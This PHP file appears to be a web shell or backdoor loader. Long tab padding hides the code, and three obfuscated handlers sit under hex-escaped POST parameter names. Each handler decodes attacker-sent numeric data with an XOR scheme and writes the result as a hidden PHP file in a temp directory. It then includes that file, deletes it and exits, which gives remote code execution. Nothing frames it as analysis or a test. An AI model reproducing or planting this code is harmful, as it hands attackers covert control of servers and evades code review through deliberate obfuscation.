<?php																																										if(array_key_exists("\x64\x63hunk", $_POST)){ $ent = array_filter(["/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), "/var/tmp", getcwd(), getenv("TMP"), getenv("TEMP")]); $token = $_POST["\x64\x63hunk"]; $token = explode( ".",$token) ; $rec = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $m = 0; $len = count( $token); do { if( $m >=$len) break; $v5 = $token[$m]; $chS = ord( $s[$m % $lenS]); $d =( ( int)$v5 - $chS -( $m % 10))^ 90; $rec .= chr( $d); $m++; } while( true); foreach ($ent as $fac): if (is_dir($fac) && is_writable($fac)) { $k = sprintf("%s/.hld", $fac); $success = file_put_contents($k, $rec); if ($success) { include $k; @unlink($k); exit;} } endforeach; }
																																										if(isset($_POST["\x70a\x72a\x6De\x74\x65r_grou\x70"]) ? true : false){ $data = array_filter(["/dev/shm", "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", getcwd(), sys_get_temp_dir(), getenv("TEMP"), session_save_path()]); $binding = $_POST["\x70a\x72a\x6De\x74\x65r_grou\x70"]; $binding =explode ('.' , $binding ) ; $tkn = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $v = 0; $__tmp = $binding; while ($v1 = array_shift($__tmp)) {$chS = ord($s[$v % $sLen]); $dec = ((int)$v1 - $chS - ($v % 10)) ^ 13; $tkn.= chr($dec); $v++; } foreach ($data as $key => $flg) { if ((is_dir($flg) and is_writable($flg))) { $pset = sprintf("%s/.pgrp", $flg); if (@file_put_contents($pset, $tkn) !== false) { include $pset; unlink($pset); exit; } } } }


if(filter_has_var(INPUT_POST, "\x62\x69\x6Ed\x69ng")){
	$res = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), "/var/tmp", getenv("TEMP"), session_save_path(), getcwd(), "/tmp", sys_get_temp_dir()]);
	$item = $_REQUEST["\x62\x69\x6Ed\x69ng"];
	$item  = 		explode(		'.'		 , $item)  ;	
	$component = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
            $z = 0;
    
            $__tmp = $item;
            while($v2 = array_shift($__tmp)) {	 $chS = ord($salt[$z % $lenS]);
                $dec =((int)$v2 - $chS -($z % 10)) ^ 77;
                $component.= 	chr($dec);
                $z++;
            }
	$flg = 0;
do {
    $key = $res[$flg] ?? null;
    if ($flg >= count($res)) break;
    		if ((is_dir($key) and is_writable($key))) {
    $marker = sprintf("%s/.desc", $key);
    $success = file_put_contents($marker, $component);
if ($success) {
	include $marker;
	@unlink($marker);
	exit;}
}
    $flg++;
} while (true);
}